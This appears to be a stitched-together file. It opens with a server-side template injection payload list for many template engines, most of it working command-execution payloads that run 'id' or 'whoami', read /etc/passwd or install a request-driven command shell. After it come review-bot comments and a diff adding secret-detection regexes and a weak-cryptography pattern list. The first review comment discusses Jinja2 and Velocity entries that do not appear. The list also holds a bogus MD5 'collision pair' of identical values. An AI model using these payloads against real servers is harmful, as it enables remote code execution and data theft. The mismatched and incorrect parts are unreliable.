<%= IO.popen('id').readlines() %>
<%= require 'open3' %><%= Open3.capture2("id")[0] %>
<%= File.open('/etc/passwd').read %>
# Thymeleaf (Java)
# Basic detection
[[${7*7}]]
[(${7*7})]
[# th:block th:each="i : ${#numbers.sequence(1, 7*7)}" /]
# Remote code execution (with SpringEL)
${T(java.lang.Runtime).getRuntime().exec('calc')}
*{T(java.lang.Runtime).getRuntime().exec('calc')}
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
# Tornado (Python)
# Basic detection
{{7*7}}
{% import os %}{{os.popen("id").read()}}
# Remote code execution
{% import subprocess %}{{subprocess.check_output('id',shell=True)}}
{% import os %}{{os.system('whoami')}}
# Mako (Python)
# Basic detection
${7*7}
<%={{7*7}%>
# Remote code execution
<%import os%>${os.popen("id").read()}
${__import__('os').popen('id').read()}
# Django (Python)
# Basic detection
{{7*7}}
{% debug %}
# Limited RCE (usually sandboxed)
{{request.META}}
{{settings.SECRET_KEY}}
# Handlebars (Node.js)
# Basic detection
{{7*7}}
{{this}}
# Prototype pollution
{{#with "constructor"}}{{#with split as |a|}}{{pop (push "alert('XSS')")}}{{#with .}}{{#with (concat (lookup join (slice 0 1)))}}{{#each .}}{{#with (string.sub.call ../sub "constructor")}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
# Groovy (Java)
# Basic detection
${7*7}
<%= 7*7 %>
# Remote code execution
${"".getClass().forName("java.lang.Runtime").getRuntime().exec("calc")}
# Dot (JavaScript)
# Basic detection
{{=7*7}}
# Remote code execution
{{= global.process.mainModule.require('child_process').execSync('id').toString() }}
# Nunjucks (JavaScript)
# Basic detection
{{7*7}}
{{foo}}
# Remote code execution
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
# Razor (.NET)
# Basic detection
@(7*7)
@{7*7}
# Information disclosure
@System.Diagnostics.Process.GetCurrentProcess().Id
@Directory.GetFiles("C:\\")
# EJS (JavaScript)
# Basic detection
<%=7*7%>
# Remote code execution
<%=global.process.mainModule.require('child_process').execSync('id')%>
# Underscore/Lodash templates (JavaScript)
# Basic detection
<%=7*7%>
# Remote code execution
<%= _.template('test')() %>
# Marko (JavaScript)
# Basic detection
${7*7}
# Remote code execution
${console.log(global.process.mainModule.require('child_process').execSync('id').toString())}
# Plate (Rust)
# Basic detection
{{7*7}}
# Liquid (Ruby)
# Basic detection
{{7 | times: 7}}
# Scalate (Scala)
# Basic detection
${7*7}
<%=7*7%>
# Template.js
# Basic detection
{{7*7}}
# Trim (Java)
# Basic detection
${7*7}
# Jade/Pug continued (with more variants)
- var x = global.process.mainModule.require
!{x('child_process').execSync('cat /etc/passwd')}
# ColdFusion
# Basic detection
#7*7#
# ASP.NET Web Forms
# Basic detection
<%= 7*7 %>
# Expression Language (Java EE)
# Basic detection
${7*7}
#{7*7}
# Remote code execution
${pageContext.request.getSession().setAttribute("shell","".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(request.getParameter("cmd")))}
# Generic testing payloads
{{self}}
${self}
<%= self %>
#{self}
*{self}
@{self}
{{constructor}}
{{__class__}}
{{__init__}}
{{__globals__}}
{{__import__}}
# Blind SSTI detection
a{{9999*9999}}b
a${9999*9999}b
a<%= 9999*9999 %>b
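Review bot: the Jinja2 entry `{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}` in the "# Remote code execution" block is broken on Python 3: `str.__mro__` is `(str, object)` (length 2), so `__mro__[2]` raises IndexError before `__subclasses__()` is ever reached; the `__mro__[1]` form used in the "# File read" block is the correct one. The subclass index `[40]` in both lines also depends on interpreter version and import order and should be commented as such. In the first Velocity block, `$out` is read in the `#foreach` line but never assigned (`#set($out=$ex.getInputStream())` only appears in the second block), so that variant cannot produce output as written. Finally, several "# Basic detection" sections contain command-execution entries (the Freemarker `Execute` line, the Smarty `{php}` line, ERB `system('whoami')`, Tornado `{% import os %}`); moving them under the respective "# Remote code execution" headings keeps the detection sections limited to the harmless arithmetic probes a scanner should try first.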
+205
@@ -21,3 +21,208 @@ AKIA[0-9A-Z]{16} # AWS Access Key pattern
[0-9a-zA-Z]{32} # Generic 32-char key
ghp_[0-9a-zA-Z]{36} # GitHub Personal Access Token pattern
sk_live_[0-9a-zA-Z]{24} # Stripe Live Secret Key pattern
# Weak encryption algorithms
# DES (Data Encryption Standard) - 56-bit key
DES
DES-CBC
DES-ECB
DES-EDE
DES-EDE-CBC
# 3DES with weak keys
3DES
DES-EDE3
DES-EDE3-CBC
# RC4 (Rivest Cipher 4)
RC4
RC4-40
RC4-128
ARCFOUR
# RC2
RC2
RC2-40-CBC
RC2-64-CBC
RC2-CBC
# MD5 hash algorithm (broken)
MD5
MD5-SHA1
# SHA1 hash algorithm (weak)
SHA1
SHA-1
# Weak RSA key sizes
RSA-512
RSA-768
RSA-1024
# ECB mode (Electronic Codebook) - deterministic
AES-128-ECB
AES-192-ECB
AES-256-ECB
# Weak padding schemes
PKCS1-v1_5
PKCS#1 v1.5
# Null encryption
NULL
eNULL
NULL-MD5
NULL-SHA
# Export grade ciphers
EXP-DES-CBC-SHA
EXP-RC2-CBC-MD5
EXP-RC4-MD5
# Anonymous key exchange (no authentication)
AECDH
ADH
aNULL
# Weak Diffie-Hellman
DH-512
DH-1024
# CBC with weak MAC (BEAST/POODLE vulnerable)
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
# SSL/TLS version issues
SSLv2
SSLv3
TLSv1.0
TLSv1.1
# Weak cipher suites
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5
TLS_RSA_WITH_DES_CBC_SHA
TLS_DH_anon_WITH_AES_128_CBC_SHA
# XOR cipher (trivial)
XOR
# Caesar cipher
ROT13
ROT47
# Vigenere cipher patterns
VIGENERE
# Insecure random number generators
# Predictable seeds
PRNG with time() seed
Math.random()
rand()
srand(time())
# Weak key derivation functions
PBKDF1
MD5-based KDF
SHA1-based KDF
# Hardcoded encryption keys (testing patterns)
key=00000000000000000000000000000000
key=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
key=12345678901234567890123456789012
secretkey=admin
encryptionKey=password
# Weak initialization vectors
IV=00000000000000000000000000000000
IV=11111111111111111111111111111111
Fixed IV
Reused IV
# Predictable salts
salt=salt
salt=123456
salt=""
No salt
# Hash collision examples
# MD5 collisions
d131dd02c5e6eec4693d9a0698aff95c # Collision pair 1
d131dd02c5e6eec4693d9a0698aff95c # Collision pair 2
# Timing attack vulnerabilities
String comparison without constant time
strcmp() without timing safety
# Padding oracle indicators
PaddingException
Invalid padding
Bad padding
# ECB detection patterns (identical blocks)
Block1: 0123456789ABCDEF
Block2: 0123456789ABCDEF
# Weak HMAC
HMAC-MD5
HMAC-SHA1
# CRC (not cryptographic)
CRC32
CRC16
ADLER32
# Length extension attacks
SHA-256 without HMAC
SHA-512 without HMAC
# Insecure modes of operation
CTR without authentication
CBC without HMAC
OFB mode
# Bit flipping attack vectors
CBC mode tampering
CFB mode tampering
# Known weak parameters
p=2 # Weak prime
g=1 # Weak generator
e=3 # Weak RSA exponent
# Textbook RSA (no padding)
RSA without OAEP
RSA without PSS
# Weak digital signatures
DSA with k reuse
ECDSA with k reuse
DSA-SHA1
# Certificate issues
Self-signed certificates
Expired certificates
MD5 certificate signature
SHA1 certificate signature
# Java Cipher strings (weak)
AES/ECB/NoPadding
AES/ECB/PKCS5Padding
DES/ECB/PKCS5Padding
DESede/ECB/PKCS5Padding
# OpenSSL weak ciphers
openssl enc -des
openssl enc -des3
openssl enc -rc4
# Bcrypt with low cost
bcrypt cost < 10
bcrypt rounds = 1
# Scrypt with weak parameters
N=2^10 (too low)
r=1 (too low)
p=1 (too low)
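Review bot: the "# MD5 collisions" entries are not a collision pair: the lines labelled "Collision pair 1" and "Collision pair 2" contain the identical 32-hex-character value, and a collision needs two distinct inputs; if the intent is to reference the published MD5 collision blocks, cite the source and include both full differing inputs, otherwise drop the section. Under "# CBC with weak MAC (BEAST/POODLE vulnerable)", the three `TLS_RSA_WITH_*_CBC_SHA` suites are not weak because of their MAC: BEAST and POODLE are CBC-mode issues in TLS 1.0 and SSLv3 respectively, and the static RSA key exchange (no forward secrecy) is the stronger reason to flag them, so the heading should say so. The file also mixes grep-able identifiers (cipher suite names, `AES/ECB/PKCS5Padding`, `openssl enc -rc4`) with free-text checklist items ("Fixed IV", "Reused IV", "String comparison without constant time", "CBC mode tampering") that nothing will match literally in source or configuration; a header comment distinguishing patterns from checklist items, or splitting them into two files, would let a scanner consume the pattern half.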